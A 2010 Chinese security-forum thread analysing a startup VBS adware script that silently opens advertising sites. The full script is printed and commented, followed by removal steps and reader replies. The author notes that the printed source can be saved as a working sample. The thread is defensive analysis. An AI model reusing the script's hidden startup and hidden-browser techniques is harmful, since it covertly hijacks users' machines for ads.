UpK软件安全社区 » 『 病毒分析 』 » 自动弹出网页的恶意脚本分析

riusksk 发表于 2010-3-2 00:47

自动弹出网页的恶意脚本分析

by:riusksk
blog:[url]http://riusksk.blogbus.com[/url]

这几天在开机后，都会自动弹出一个广告网站，在注册表中搜索弹出的网页，无果而返，接着再看了一下启动项，发现个VBS脚本文件，如下图：
[attach]33256[/attach]
找到这个脚本文件后，用记事本打开，代码如下：

[color=#008000]00000:[/color] [color=#0000D0]On[/color] [color=#0000D0]Error[/color] [color=#0000D0]Resume[/color] [color=#0000D0]Next[/color]
[color=#008000]00001:[/color] [color=#0000D0]Dim[/color] Fso,wss,HKRegStr
[color=#008000]00002:[/color] [color=#0000D0]Set[/color] Fso= [color=#FF0000]CreateObject[/color]([color=#808080]"Scripting.FileSystemObject"[/color])
[color=#008000]00003:[/color] [color=#0000D0]Set[/color] wss=[color=#FF0000]CreateObject[/color]([color=#808080]"WScript.Shell"[/color])
[color=#008000]00004:[/color] HKRegStr=wss.RegRead([color=#808080]"HKEY_CURRENT_USER\Software\Maxthon2\Folder"[/color])
[color=#008000]00005:[/color] [color=#0000D0]if[/color] HKRegStr<>[color=#808080]""[/color] [color=#0000D0]then[/color]
[color=#008000]00006:[/color] HKRegStr=HKRegStr+[color=#808080]"\Maxthon.exe"[/color]     [color=#008000]'默认使用傲游浏览器打开网站[/color]
[color=#008000]00007:[/color] [color=#0000D0]if[/color] (Fso.FileExists(HKRegStr)) [color=#0000D0]then[/color]
[color=#008000]00008:[/color] wscript.[b][color=#000080]sleep[/color][/b] 600000        [color=#008000]'脚本运行10分钟之后再打开网站[/color]
[color=#008000]00009:[/color] [color=#008000]'网址之家.url是一个快捷方式文件，指向[url]http://www.so02.cn/?sid=1[/url]，如下图所示：[/color]
[attach]33257[/attach]
[color=#008000]00010:[/color] [color=#FF0000]CreateObject[/color]([color=#808080]"WScript.Shell"[/color]).run [color=#808080]""[/color][color=#808080]""[/color] & HKRegStr &[color=#808080]""[/color][color=#808080]" C:\Windows\system32\网址之家.url"[/color],x,ture   
[color=#008000]00011:[/color] [color=#0000D0]set[/color] ie=WScript.[color=#FF0000]createobject[/color]([color=#808080]"internetexplorer.application"[/color])
[color=#008000]00012:[/color] ie.visible = 0
[color=#008000]00013:[/color] ie.navigate [color=#808080]"http://qw.ad29.com/ji.asp"[/color]                [color=#008000]'接着再打开这个网址[/color]
[color=#008000]00014:[/color] wscript.[b][color=#000080]sleep[/color][/b] 10000        [color=#008000]'暂时10秒[/color]
[color=#008000]00015:[/color] ie.quit
[color=#008000]00016:[/color] [color=#0000D0]else[/color]
[color=#008000]00017:[/color] [color=#008000]'假如没有注册表中指定的Maxthon.exe，则用默认浏览器打开网址之家.url，也就是[url]http://www.so02.cn/?sid=1[/url][/color]
[color=#008000]00018:[/color] wscript.[b][color=#000080]sleep[/color][/b] 600000
[color=#008000]00019:[/color] [color=#FF0000]CreateObject[/color]([color=#808080]"WScript.Shell"[/color]).run[color=#808080]" C:\Windows\system32\网址之家.url"[/color],x,ture       
[color=#008000]00020:[/color] [color=#0000D0]end[/color] [color=#0000D0]if[/color]
[color=#008000]00021:[/color] [color=#0000D0]else[/color]
[color=#008000]00022:[/color] [color=#008000]'假如注册表HKEY_CURRENT_USER\Software\Maxthon2\Folder无键值，则10分钟后打开网址之家.url[/color]
[color=#008000]00023:[/color] wscript.[b][color=#000080]sleep[/color][/b] 600000
[color=#008000]00024:[/color] [color=#FF0000]CreateObject[/color]([color=#808080]"WScript.Shell"[/color]).run [color=#808080]"C:\Windows\system32\网址之家.url"[/color] ,x,ture
[color=#008000]00025:[/color] [color=#0000D0]end[/color] [color=#0000D0]if[/color]

清除方法：去掉启动项中的网址之家.vbs并将其删除，再将 C:\Windows\system32\网址之家.url 也清除，重启之后搞定。

jerrynpc 发表于 2010-3-2 02:04

每次都能坐泉哥的大...打我PG我不乖...。O(∩_∩)O哈哈~

gkulm1775 发表于 2010-3-2 02:40

支持楼主

creekcn 发表于 2010-3-2 03:30

学习了 谢谢

娃娃鱼 发表于 2010-3-2 09:46

这个方法是很不错！学习了！

kelvar 发表于 2010-3-2 10:21

前段时间被这东西这么了很长时间。总是莫名的修改主页。悄悄的修改，真是让人郁闷。多谢LZ分享

中专学历 发表于 2010-3-2 10:54

学习了 谢谢:D:

riusksk 发表于 2010-3-2 12:58

[i=s] 本帖最后由 riusksk 于 2010-3-2 13:47 编辑 [/i]

[quote]每次都能坐泉哥的大...打我PG我不乖...。O(∩_∩)O哈哈~
[size=2][color=#999999]jerrynpc 发表于 2010-3-2 02:04[/color] [url=http://unpack.cn/redirect.php?goto=findpost&pid=611685&ptid=46572][img]http://unpack.cn/images/common/back.gif[/img][/url][/size][/quote]


    两点起来占...打我PG我不乖...，你也太有才了吧
一时没注意，你也有10UF，恭喜早日升官发财:lol

ldlsgd 发表于 2010-3-2 13:15

学习一下！

jerrynpc 发表于 2010-3-2 15:50

[quote]两点起来占...打我PG我不乖...，你也太有才了吧
一时没注意，你也有10UF，恭喜早日升官发财
[size=2][color=#999999]riusksk 发表于 2010-3-2 12:58[/color] [url=http://www.unpack.cn/redirect.php?goto=findpost&pid=611948&ptid=46572][img]http://www.unpack.cn/images/common/back.gif[/img][/url][/size][/quote]


    谢谢泉哥，今天心情不错。暂时不鄙视你了。
一个vbs还搞这么复杂干啥啊

riusksk 发表于 2010-3-2 16:53

[quote]谢谢泉哥，今天心情不错。暂时不鄙视你了。
一个vbs还搞这么复杂干啥啊
[size=2][color=#999999]jerrynpc 发表于 2010-3-2 15:50[/color] [url=http://unpack.cn/redirect.php?goto=findpost&pid=612043&ptid=46572][img]http://unpack.cn/images/common/back.gif[/img][/url][/size][/quote]


    记录一下，顺便更新博客嘛:lol

少马石 发表于 2010-3-3 07:53

学习一下。。

fly 发表于 2010-3-5 17:03

[quote]标题：自动弹出网页的恶意脚本分析
链接：[url]http://www.unpack.cn/viewthread.php?tid=46572[/url]
贴者：riusksk
日期: 2010-3-2 00:47 [/quote]

john 发表于 2010-3-5 20:27

这类恶意改首页的，真是千奇百怪，
什么样的方式都有啊。
急需要一个救世主。来拯救广大网友了。。

riusksk 发表于 2010-3-5 20:35

也不知道这脚本是浏览哪个网站中标的，安装个HIPS，觉得还是有必要的，不然有些杀软有昨根本派不上用场，用HIPS还可以查看日志，任何文件，注册表操作……都会记录的，容易查出病毒木马，只不过得自己手杀，呵呵

lixian_cn 发表于 2010-3-6 19:12

我爱Upack论坛

中专学历 发表于 2010-3-9 00:32

学习了 谢谢

任我淘 发表于 2010-3-24 11:55

晚来的支持啊，牛啊，发展迅猛

espzj 发表于 2010-3-27 08:58

不错，分析得不错。。

hxu 发表于 2010-4-4 21:14

有样本不啊？

riusksk 发表于 2010-4-5 18:25

[quote]有样本不啊？
[size=2][color=#999999]hxu 发表于 2010-4-4 21:14[/color] [url=http://unpack.cn/redirect.php?goto=findpost&pid=637602&ptid=46572][img]http://unpack.cn/images/common/back.gif[/img][/url][/size][/quote]


    源码不是都给了，保存为vbs文件不就是样本了

damo 发表于 2010-4-30 12:38

学习了 谢谢

whatcsh 发表于 2010-6-3 21:47

脚本啊 。。。。。。。。

查看完整版本: 自动弹出网页的恶意脚本分析